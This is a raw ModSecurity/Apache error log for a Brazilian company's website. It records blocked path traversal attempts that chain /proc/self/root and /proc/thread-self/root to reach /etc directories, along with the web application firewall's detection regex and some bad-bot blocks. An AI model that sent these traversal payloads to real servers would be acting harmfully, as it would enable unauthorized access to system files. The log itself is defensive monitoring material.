[Mon Mar 16 10:37:11.538935 2026] [:error] [pid 10651:tid 140411683178240] [client 74.7.241.46:57296] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHhrysWC90G-1nBrA5ngAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:37:21.377439 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.243.203:52186] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHkf9ocpUE4ed4uDzhIAAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:37:38.335086 2026] [:error] [pid 10772:tid 140411649607424] [client 74.7.241.46:51206] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHov9ocpUE4ed4uDzhPQAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:37:40.179411 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.241.46:53454] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHo7ysWC90G-1nBrA5nwAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:37:41.502335 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.241.46:53470] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHpbysWC90G-1nBrA5oQAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:37:44.324055 2026] [:error] [pid 10772:tid 140411632822016] [client 74.7.243.203:44514] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHqP9ocpUE4ed4uDzhQQAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:37:45.653278 2026] [:error] [pid 10709:tid 140411632822016] [client 74.7.241.46:53474] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHqRXjF1vJNtV6CWrs6gAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:37:46.703797 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.243.203:34144] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHqrABkC4fWIHEf8HgBQAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:37:48.263428 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.243.203:34154] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHrLABkC4fWIHEf8HgBgAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:37:54.386189 2026] [:error] [pid 21533:tid 140411641214720] [client 74.7.243.203:34158] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHsnjZBu2q05ozVU9JSQAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:38:09.923447 2026] [:error] [pid 21805:tid 140411641214720] [client 74.7.243.203:60744] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHwbABkC4fWIHEf8HgGgAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:38:11.252610 2026] [:error] [pid 10651:tid 140411658000128] [client 74.7.243.203:58568] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHw7ysWC90G-1nBrA5qQAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:38:13.425050 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.243.203:58580] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHxZqj1wV0Si-OkefdxAAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:38:25.348788 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.244.31:35428] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgH0f9ocpUE4ed4uDzhVAAAAhU"]
[Mon Mar 16 10:38:41.100191 2026] [:error] [pid 21946:tid 140411590858496] [client 74.7.241.46:53486] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgH4XbQATo66fKoS7xBEAAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:38:42.430071 2026] [:error] [pid 10831:tid 140411599251200] [client 74.7.241.46:39418] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgH4o6lpbStxTqkSkthggAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:38:43.640542 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.241.46:39428] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgH47ysWC90G-1nBrA5rAAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:40:13.564971 2026] [:error] [pid 21806:tid 140411683178240] [client 74.7.243.203:55572] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgIPdSswJuvopo3lOhT0QAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:40:58.678699 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.228.16:45018] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgIanjZBu2q05ozVU9JkgAAAUo"]
[Mon Mar 16 10:42:18.189263 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.243.203:55814] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgIurABkC4fWIHEf8HgPAAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:42:19.536244 2026] [:error] [pid 10651:tid 140411691570944] [client 74.7.243.203:55822] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgIu7ysWC90G-1nBrA5wwAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:42:38.246511 2026] [:error] [pid 10709:tid 140411666392832] [client 74.7.241.46:32824] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgIzhXjF1vJNtV6CWrtEAAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:42:46.387326 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.241.46:43120] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgI1tSswJuvopo3lOhT4wAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
